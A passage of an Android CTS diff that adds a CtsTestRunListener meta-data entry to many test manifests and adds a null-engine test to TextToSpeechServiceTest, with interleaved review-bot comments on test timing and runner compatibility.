+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
index bce1b28..a209894 100644
--- a/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdkcurrent.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/sensorprivacy/AndroidManifest.xml b/tests/tests/sensorprivacy/AndroidManifest.xml
index 0fcfa2c..7b53910 100644
--- a/tests/tests/sensorprivacy/AndroidManifest.xml
+++ b/tests/tests/sensorprivacy/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.sensorprivacy.cts"
android:label="CTS tests of android.sensorprivacy">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/settings/AndroidManifest.xml b/tests/tests/settings/AndroidManifest.xml
index b1d3931..bc50a58 100644
--- a/tests/tests/settings/AndroidManifest.xml
+++ b/tests/tests/settings/AndroidManifest.xml
@@ -45,5 +45,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.settings.cts"
android:label="CTS tests of android Settings app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/sharesheet/AndroidManifest.xml b/tests/tests/sharesheet/AndroidManifest.xml
index 13f0163..f313997 100644
--- a/tests/tests/sharesheet/AndroidManifest.xml
+++ b/tests/tests/sharesheet/AndroidManifest.xml
@@ -79,6 +79,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.sharesheet.cts"
android:label="CTS tests of android.sharesheet">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/shortcutmanager/AndroidManifest.xml b/tests/tests/shortcutmanager/AndroidManifest.xml
index 6feea73..182a1d8 100755
--- a/tests/tests/shortcutmanager/AndroidManifest.xml
+++ b/tests/tests/shortcutmanager/AndroidManifest.xml
@@ -67,6 +67,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.pm.cts.shortcutmanager"
android:label="CTS tests for ShortcutManager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/simphonebookprovider/AndroidManifest.xml b/tests/tests/simphonebookprovider/AndroidManifest.xml
index 9dc1559..ca62323 100644
--- a/tests/tests/simphonebookprovider/AndroidManifest.xml
+++ b/tests/tests/simphonebookprovider/AndroidManifest.xml
@@ -30,6 +30,9 @@
<instrumentation
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.simphonebook">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-feature android:name="android.hardware.telephony" />
diff --git a/tests/tests/slice/AndroidManifest.xml b/tests/tests/slice/AndroidManifest.xml
index 88fe774..668ae0a 100644
--- a/tests/tests/slice/AndroidManifest.xml
+++ b/tests/tests/slice/AndroidManifest.xml
@@ -52,6 +52,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.slice.cts"
android:label="CTS tests of android.slice">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/soundtrigger/AndroidManifest.xml b/tests/tests/soundtrigger/AndroidManifest.xml
index e9c6541..cfdc69f 100644
--- a/tests/tests/soundtrigger/AndroidManifest.xml
+++ b/tests/tests/soundtrigger/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.soundtrigger.cts"
android:label="CTS tests of android.soundtrigger">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/speech/AndroidManifest.xml b/tests/tests/speech/AndroidManifest.xml
index f801a2a..5043d03 100755
--- a/tests/tests/speech/AndroidManifest.xml
+++ b/tests/tests/speech/AndroidManifest.xml
@@ -46,6 +46,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.speech.tts.cts"
android:label="CTS tests of android.speech">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java b/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
index 869b7e4..97c0c8a 100644
--- a/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
+++ b/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
@@ -15,21 +15,30 @@
*/
package android.speech.tts.cts;
+import android.content.Context;
import android.media.AudioAttributes;
import android.net.Uri;
import android.os.Bundle;
import android.os.ConditionVariable;
-import android.os.Environment;
+import android.os.IBinder;
import android.os.ParcelFileDescriptor;
+import android.os.ServiceManager;
+import android.speech.tts.ITextToSpeechManager;
+import android.speech.tts.ITextToSpeechSession;
+import android.speech.tts.ITextToSpeechSessionCallback;
import android.speech.tts.TextToSpeech;
import android.test.AndroidTestCase;
+import com.google.common.util.concurrent.SettableFuture;
+
import java.io.File;
import java.io.FileOutputStream;
import java.util.HashMap;
-import java.util.Map;
import java.util.List;
import java.util.Locale;
+import java.util.Map;
+import java.util.Objects;
+import java.util.concurrent.TimeUnit;
/**
* Tests for {@link android.speech.tts.TextToSpeechService} using StubTextToSpeechService.
@@ -60,6 +69,37 @@
return mTts.getTts();
}
+ public void testNullEngine() throws Exception {
+ IBinder binder = ServiceManager.getService(Context.TEXT_TO_SPEECH_MANAGER_SERVICE);
+ ITextToSpeechManager manager =
+ Objects.requireNonNull(ITextToSpeechManager.Stub.asInterface(binder));
+ // could use a spy instead but we run into "cannot proxy inaccessible class" issues
+ final SettableFuture<String> errorMsg = SettableFuture.create();
+ final SettableFuture<Void> connected = SettableFuture.create();
+ final SettableFuture<Void> disconnected = SettableFuture.create();
+ ITextToSpeechSessionCallback callback =
+ new ITextToSpeechSessionCallback.Stub() {
+ @Override
+ public void onConnected(ITextToSpeechSession session, IBinder serviceBinder) {
+ connected.set(null);
+ }
+
+ @Override
+ public void onDisconnected() {
+ disconnected.set(null);
+ }
+
+ @Override
+ public void onError(String errorInfo) {
+ errorMsg.set(errorInfo);
+ }
+ };
+ manager.createSession(null, callback);
+ assertFalse(connected.isDone());
+ assertFalse(disconnected.isDone());
+ assertEquals("Engine cannot be null", errorMsg.get(1, TimeUnit.SECONDS));
+ }
+
public void testSynthesizeToFile() throws Exception {
File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
try {
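Review bot: In `testNullEngine`, the checks `assertFalse(connected.isDone())` and `assertFalse(disconnected.isDone())` run right after `createSession(null, callback)` returns, before the test has waited for any callback. If the callback is delivered asynchronously (not visible here), they pass even when the service later calls `onConnected`. Moving both below `assertEquals("Engine cannot be null", errorMsg.get(1, TimeUnit.SECONDS));` makes the negative checks meaningful, because by then the service has already reported its outcome. The one-second bound is also tight for a binder round trip on a loaded device and would surface as a `TimeoutException` rather than an assertion failure. The hunk ends inside `testSynthesizeToFile`, whose body continues outside it.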
@@ -67,7 +107,7 @@
int result =
getTts().synthesizeToFile(
- UTTERANCE, createParams("mocktofile"), sampleFile.getPath());
+ UTTERANCE, createParams("mocktofile"), sampleFile.getPath());
verifySynthesisFile(result, mTts, sampleFile);
} finally {
sampleFile.delete();
@@ -84,10 +124,10 @@
int result =
getTts().synthesizeToFile(
- UTTERANCE,
- params,
- sampleFile,
- params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+ UTTERANCE,
+ params,
+ sampleFile,
+ params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
verifySynthesisFile(result, mTts, sampleFile);
} finally {
sampleFile.delete();
@@ -101,16 +141,16 @@
assertFalse(sampleFile.exists());
ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
- ParcelFileDescriptor.MODE_WRITE_ONLY
- | ParcelFileDescriptor.MODE_CREATE
- | ParcelFileDescriptor.MODE_TRUNCATE);
+ ParcelFileDescriptor.MODE_WRITE_ONLY
+ | ParcelFileDescriptor.MODE_CREATE
+ | ParcelFileDescriptor.MODE_TRUNCATE);
Bundle params = createParamsBundle("mocktofile");
int result =
- getTts().synthesizeToFile(
- UTTERANCE, params, fileDescriptor,
- params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+ getTts().synthesizeToFile(
+ UTTERANCE, params, fileDescriptor,
+ params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
verifySynthesisFile(result, mTts, sampleFile);
} finally {
sampleFile.delete();
@@ -119,29 +159,30 @@
}
public void testMaxSpeechInputLength() {
- File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
- try {
- assertFalse(sampleFile.exists());
- TextToSpeech tts = getTts();
+ File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+ try {
+ assertFalse(sampleFile.exists());
+ TextToSpeech tts = getTts();
- int maxLength = tts.getMaxSpeechInputLength();
- StringBuilder sb = new StringBuilder();
- for (int i = 0; i < maxLength; i++) {
+ int maxLength = tts.getMaxSpeechInputLength();
+ StringBuilder sb = new StringBuilder();
+ for (int i = 0; i < maxLength; i++) {
+ sb.append("c");
+ }
+ String valid = sb.toString();
sb.append("c");
- }
- String valid = sb.toString();
- sb.append("c");
- String invalid = sb.toString();
+ String invalid = sb.toString();
- assertEquals(maxLength, valid.length());
- assertTrue(invalid.length() > maxLength);
- assertEquals(TextToSpeech.ERROR,
- tts.synthesizeToFile(invalid, createParams("mockToFile"), sampleFile.getPath()));
- assertEquals(TextToSpeech.SUCCESS,
- tts.synthesizeToFile(valid, createParams("mockToFile"), sampleFile.getPath()));
- } finally {
- sampleFile.delete();
- }
+ assertEquals(maxLength, valid.length());
+ assertTrue(invalid.length() > maxLength);
+ assertEquals(TextToSpeech.ERROR,
+ tts.synthesizeToFile(invalid, createParams("mockToFile"),
+ sampleFile.getPath()));
+ assertEquals(TextToSpeech.SUCCESS,
+ tts.synthesizeToFile(valid, createParams("mockToFile"), sampleFile.getPath()));
+ } finally {
+ sampleFile.delete();
+ }
}
public void testSpeak() throws Exception {
@@ -203,7 +244,7 @@
try {
assertFalse(TextToSpeechWrapper.isSoundFile(sampleFile.getPath()));
FileOutputStream out = new FileOutputStream(sampleFile);
- out.write(new byte[] { 0x01, 0x02 });
+ out.write(new byte[]{0x01, 0x02});
out.close();
assertFalse(TextToSpeechWrapper.isSoundFile(sampleFile.getPath()));
} finally {
@@ -212,79 +253,81 @@
}
public void testAddPlayEarcon() throws Exception {
- File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
- try {
- generateSampleAudio(sampleFile);
+ File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+ try {
+ generateSampleAudio(sampleFile);
- Uri sampleUri = Uri.fromFile(sampleFile);
- assertEquals(getTts().addEarcon(EARCON_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
+ Uri sampleUri = Uri.fromFile(sampleFile);
+ assertEquals(getTts().addEarcon(EARCON_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
- int result = getTts().playEarcon(EARCON_UTTERANCE,
- TextToSpeech.QUEUE_FLUSH, createParamsBundle(EARCON_UTTERANCE), EARCON_UTTERANCE);
+ int result = getTts().playEarcon(EARCON_UTTERANCE,
+ TextToSpeech.QUEUE_FLUSH, createParamsBundle(EARCON_UTTERANCE),
+ EARCON_UTTERANCE);
- verifyAddPlay(result, mTts, EARCON_UTTERANCE);
- } finally {
- sampleFile.delete();
- }
+ verifyAddPlay(result, mTts, EARCON_UTTERANCE);
+ } finally {
+ sampleFile.delete();
+ }
}
public void testAddPlaySpeech() throws Exception {
- File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
- try {
- generateSampleAudio(sampleFile);
+ File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+ try {
+ generateSampleAudio(sampleFile);
- Uri sampleUri = Uri.fromFile(sampleFile);
- assertEquals(getTts().addSpeech(SPEECH_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
+ Uri sampleUri = Uri.fromFile(sampleFile);
+ assertEquals(getTts().addSpeech(SPEECH_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
- int result = getTts().speak(SPEECH_UTTERANCE,
- TextToSpeech.QUEUE_FLUSH, createParamsBundle(SPEECH_UTTERANCE), SPEECH_UTTERANCE);
+ int result = getTts().speak(SPEECH_UTTERANCE,
+ TextToSpeech.QUEUE_FLUSH, createParamsBundle(SPEECH_UTTERANCE),
+ SPEECH_UTTERANCE);
- verifyAddPlay(result, mTts, SPEECH_UTTERANCE);
- } finally {
- sampleFile.delete();
- }
+ verifyAddPlay(result, mTts, SPEECH_UTTERANCE);
+ } finally {
+ sampleFile.delete();
+ }
}
public void testSetLanguage() {
- TextToSpeech tts = getTts();
+ TextToSpeech tts = getTts();
- assertEquals(tts.setLanguage(null), TextToSpeech.LANG_NOT_SUPPORTED);
- assertEquals(tts.setLanguage(new Locale("en", "US")), TextToSpeech.LANG_COUNTRY_AVAILABLE);
- assertEquals(tts.setLanguage(new Locale("en")), TextToSpeech.LANG_AVAILABLE);
- assertEquals(tts.setLanguage(new Locale("es", "US")), TextToSpeech.LANG_NOT_SUPPORTED);
+ assertEquals(tts.setLanguage(null), TextToSpeech.LANG_NOT_SUPPORTED);
+ assertEquals(tts.setLanguage(new Locale("en", "US")), TextToSpeech.LANG_COUNTRY_AVAILABLE);
+ assertEquals(tts.setLanguage(new Locale("en")), TextToSpeech.LANG_AVAILABLE);
+ assertEquals(tts.setLanguage(new Locale("es", "US")), TextToSpeech.LANG_NOT_SUPPORTED);
}
public void testAddAudioAttributes() {
- TextToSpeech tts = getTts();
- AudioAttributes attr =
- new AudioAttributes.Builder().setUsage(AudioAttributes.USAGE_MEDIA).build();
+ TextToSpeech tts = getTts();
+ AudioAttributes attr =
+ new AudioAttributes.Builder().setUsage(AudioAttributes.USAGE_MEDIA).build();
- assertEquals(tts.setAudioAttributes(null), TextToSpeech.ERROR);
- assertEquals(tts.setAudioAttributes(attr), TextToSpeech.SUCCESS);
+ assertEquals(tts.setAudioAttributes(null), TextToSpeech.ERROR);
+ assertEquals(tts.setAudioAttributes(attr), TextToSpeech.SUCCESS);
}
private void generateSampleAudio(File sampleFile) throws Exception {
- assertFalse(sampleFile.exists());
+ assertFalse(sampleFile.exists());
- ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
- ParcelFileDescriptor.MODE_WRITE_ONLY
- | ParcelFileDescriptor.MODE_CREATE
- | ParcelFileDescriptor.MODE_TRUNCATE);
+ ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
+ ParcelFileDescriptor.MODE_WRITE_ONLY
+ | ParcelFileDescriptor.MODE_CREATE
+ | ParcelFileDescriptor.MODE_TRUNCATE);
- Bundle params = createParamsBundle("mocktofile");
+ Bundle params = createParamsBundle("mocktofile");
- int result =
- getTts().synthesizeToFile(
- UTTERANCE, params, fileDescriptor,
- params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+ int result =
+ getTts().synthesizeToFile(
+ UTTERANCE, params, fileDescriptor,
+ params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
- verifySynthesisFile(result, mTts, sampleFile);
+ verifySynthesisFile(result, mTts, sampleFile);
}
private void verifyAddPlay(int result, TextToSpeechWrapper mTts, String utterance)
- throws Exception {
- assertEquals(TextToSpeech.SUCCESS, result);
- assertTrue(mTts.waitForComplete(utterance));
+ throws Exception {
+ assertEquals(TextToSpeech.SUCCESS, result);
+ assertTrue(mTts.waitForComplete(utterance));
}
private HashMap<String, String> createParams(String utteranceId) {
@@ -300,7 +343,7 @@
}
private void verifySynthesisFile(int result, TextToSpeechWrapper mTts, File file)
- throws InterruptedException {
+ throws InterruptedException {
assertEquals("synthesizeToFile() failed", TextToSpeech.SUCCESS, result);
diff --git a/tests/tests/syncmanager/AndroidManifest.xml b/tests/tests/syncmanager/AndroidManifest.xml
index bf4eb96..f456465 100755
--- a/tests/tests/syncmanager/AndroidManifest.xml
+++ b/tests/tests/syncmanager/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.syncmanager.cts"
android:label="CTS tests for sync manager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/taskfpscallback/AndroidManifest.xml b/tests/tests/taskfpscallback/AndroidManifest.xml
index 8a988b0..f7bd875 100644
--- a/tests/tests/taskfpscallback/AndroidManifest.xml
+++ b/tests/tests/taskfpscallback/AndroidManifest.xml
@@ -35,5 +35,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.taskfpscallback.cts"
android:label="CTS tests of android TaskFpsCallback service">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telecom/AndroidManifest.xml b/tests/tests/telecom/AndroidManifest.xml
index 5b73466..9c2b522 100644
--- a/tests/tests/telecom/AndroidManifest.xml
+++ b/tests/tests/telecom/AndroidManifest.xml
@@ -208,5 +208,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telecom.cts"
android:label="CTS tests for android.telecom package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telecom2/AndroidManifest.xml b/tests/tests/telecom2/AndroidManifest.xml
index 35543c9..9bc56a7 100644
--- a/tests/tests/telecom2/AndroidManifest.xml
+++ b/tests/tests/telecom2/AndroidManifest.xml
@@ -80,5 +80,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telecom2.cts"
android:label="CTS tests for android.telecom package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telecom3/AndroidManifest.xml b/tests/tests/telecom3/AndroidManifest.xml
index a870a94..351260c 100644
--- a/tests/tests/telecom3/AndroidManifest.xml
+++ b/tests/tests/telecom3/AndroidManifest.xml
@@ -86,5 +86,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telecom3.cts"
android:label="CTS tests for android.telecom package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony/current/AndroidManifest.xml b/tests/tests/telephony/current/AndroidManifest.xml
index 027371a..8730f5e 100644
--- a/tests/tests/telephony/current/AndroidManifest.xml
+++ b/tests/tests/telephony/current/AndroidManifest.xml
@@ -305,6 +305,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony.cts"
android:label="CTS tests of android.telephony">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<!-- Make sure the cts can connect to CarrierMessagingServices. This is needed for
diff --git a/tests/tests/telephony2/AndroidManifest.xml b/tests/tests/telephony2/AndroidManifest.xml
index 5ddbe0e..854154e 100644
--- a/tests/tests/telephony2/AndroidManifest.xml
+++ b/tests/tests/telephony2/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony2.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony3/AndroidManifest.xml b/tests/tests/telephony3/AndroidManifest.xml
index 7f363c9..22372b8 100644
--- a/tests/tests/telephony3/AndroidManifest.xml
+++ b/tests/tests/telephony3/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony3.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony4/AndroidManifest.xml b/tests/tests/telephony4/AndroidManifest.xml
index 861bb6e..aa4221f 100644
--- a/tests/tests/telephony4/AndroidManifest.xml
+++ b/tests/tests/telephony4/AndroidManifest.xml
@@ -24,6 +24,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony4.cts"
android:label="CTS tests of android.telephony4">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony5/AndroidManifest.xml b/tests/tests/telephony5/AndroidManifest.xml
index bdf4e30..22950a6 100644
--- a/tests/tests/telephony5/AndroidManifest.xml
+++ b/tests/tests/telephony5/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony5.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/text/AndroidManifest.xml b/tests/tests/text/AndroidManifest.xml
index e47e10c..33380f6 100644
--- a/tests/tests/text/AndroidManifest.xml
+++ b/tests/tests/text/AndroidManifest.xml
@@ -89,6 +89,8 @@
<instrumentation android:name="android.text.cts.runner.CtsTextRunner"
android:targetPackage="android.text.cts"
android:label="CTS tests of android.text">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
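Review bot: This instrumentation uses the custom `android.text.cts.runner.CtsTextRunner`, unlike the other manifests in this change, which use `androidx.test.runner.AndroidJUnitRunner`. The added `listener` meta-data only takes effect if that runner reads it, presumably by extending AndroidJUnitRunner, which is not visible here. If it does not, the entry is silently ignored and this module runs without `CtsTestRunListener`. A short comment above the element would record the dependency: `<!-- Relies on CtsTextRunner honouring the AndroidJUnitRunner "listener" meta-data -->`.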
diff --git a/tests/tests/textclassifier/AndroidManifest.xml b/tests/tests/textclassifier/AndroidManifest.xml
index 3271b5e..12b4c8a 100644
--- a/tests/tests/textclassifier/AndroidManifest.xml
+++ b/tests/tests/textclassifier/AndroidManifest.xml
@@ -40,6 +40,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.textclassifier.cts"
android:label="CTS tests of android.view.textclassifier">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/theme/AndroidManifest.xml b/tests/tests/theme/AndroidManifest.xml
index 194354f..0264cbf 100644
--- a/tests/tests/theme/AndroidManifest.xml
+++ b/tests/tests/theme/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.theme.cts"
android:label="CTS tests for themes">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/time/AndroidManifest.xml b/tests/tests/time/AndroidManifest.xml
index 71b0649..71b7a53 100644
--- a/tests/tests/time/AndroidManifest.xml
+++ b/tests/tests/time/AndroidManifest.xml
@@ -36,6 +36,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.time.cts"
android:label="CTS tests for android.time">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/toast/AndroidManifest.xml b/tests/tests/toast/AndroidManifest.xml
index f32d16e..9b0804f 100644
--- a/tests/tests/toast/AndroidManifest.xml
+++ b/tests/tests/toast/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.toast.cts"
android:label="CTS tests for toast windows">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/toastlegacy/AndroidManifest.xml b/tests/tests/toastlegacy/AndroidManifest.xml
index 65b02be..df11613 100644
--- a/tests/tests/toastlegacy/AndroidManifest.xml
+++ b/tests/tests/toastlegacy/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.toast.legacy.cts"
android:label="CTS tests for legacy toast windows">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/tools/processors/view_inspector/AndroidManifest.xml b/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
index 8b90543..a5399b1 100644
--- a/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
+++ b/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.processor.view.inspector.cts"
android:label="CTS tests of android.processor.view.inspector">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/transition/AndroidManifest.xml b/tests/tests/transition/AndroidManifest.xml
index 8b3da0d..f2d7001 100644
--- a/tests/tests/transition/AndroidManifest.xml
+++ b/tests/tests/transition/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.transition.cts"
android:label="CTS tests for android.transition package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/tv/AndroidManifest.xml b/tests/tests/tv/AndroidManifest.xml
index ea73dbb..15b97ac 100644
--- a/tests/tests/tv/AndroidManifest.xml
+++ b/tests/tests/tv/AndroidManifest.xml
@@ -188,5 +188,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.tv.cts"
android:label="Tests for the TV APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/uiautomation/AndroidManifest.xml b/tests/tests/uiautomation/AndroidManifest.xml
index 1ff02a5..edf730d 100644
--- a/tests/tests/uiautomation/AndroidManifest.xml
+++ b/tests/tests/uiautomation/AndroidManifest.xml
@@ -51,6 +51,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.uiautomation.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/uidisolation/AndroidManifest.xml b/tests/tests/uidisolation/AndroidManifest.xml
index 3dfbf0e..0872521 100644
--- a/tests/tests/uidisolation/AndroidManifest.xml
+++ b/tests/tests/uidisolation/AndroidManifest.xml
@@ -36,6 +36,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.uidisolation.cts"
android:label="CTS tests of android.uidisolation">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/uidmigration/AndroidManifest.xml b/tests/tests/uidmigration/AndroidManifest.xml
index 5ee31b4..c3530da 100644
--- a/tests/tests/uidmigration/AndroidManifest.xml
+++ b/tests/tests/uidmigration/AndroidManifest.xml
@@ -23,6 +23,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.uidmigration.cts"
android:label="CTS tests of android.uidmigration" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/usb/AndroidManifest.xml b/tests/tests/usb/AndroidManifest.xml
index 9bde1f2..30345e0 100644
--- a/tests/tests/usb/AndroidManifest.xml
+++ b/tests/tests/usb/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.usb.cts"
android:label="CTS tests of USB component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/util/AndroidManifest.xml b/tests/tests/util/AndroidManifest.xml
index e017789..bcb9bb8 100644
--- a/tests/tests/util/AndroidManifest.xml
+++ b/tests/tests/util/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.util.cts"
android:label="CTS tests of android.util">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
